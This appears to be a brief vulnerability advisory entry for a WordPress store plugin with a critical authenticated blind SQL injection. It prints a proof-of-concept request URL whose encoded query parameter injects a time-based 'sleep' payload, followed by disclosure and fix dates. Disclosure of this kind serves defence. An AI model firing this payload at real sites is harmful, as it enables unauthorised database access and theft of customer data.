The plugin was reported to be affected by a critical Authenticated Blind SQL Injection vulnerability.
http://www.example.com/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][taxonomy]=a%252522%252529%252520or%252520sleep%25252810.1%252529%252523
2021-07-15 (about 11 months ago)
2021-07-15 (about 11 months ago)
2022-04-12 (about 2 months ago)